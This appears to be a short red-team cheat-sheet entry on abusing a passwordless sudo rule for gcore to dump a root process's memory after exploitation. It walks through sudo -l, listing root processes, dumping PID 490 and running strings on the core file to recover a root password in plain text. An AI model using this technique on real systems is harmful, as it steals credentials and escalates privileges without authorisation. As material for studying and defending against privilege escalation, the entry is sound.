Gcore

gcore is a CLI that creates a core dump of a running process without stopping it. This memory snapshot includes the process’s stack, heap, and loaded libraries, and is useful for extracting sensitive data or analyzing execution state during red team operations. It requires the PID of the target process and appropriate permissions. The output (core.<PID>) can be examined with tools like gdb or simply via strings making gcore valuable for stealthy, in-memory analysis during post-exploitation.

# Check user's permissions
$ sudo -l
User x7331 may run the following commands on kali:
    (ALL) NOPASSWD: /usr/bin/gcore
    
# List root processes
$ ps -u root -o pid,comm
490 password-store

# Dump the process
$ sudo gcore 490
​
# Inspect the file
$ strings core.490
001 Password: root:
R00tM3Plz!!!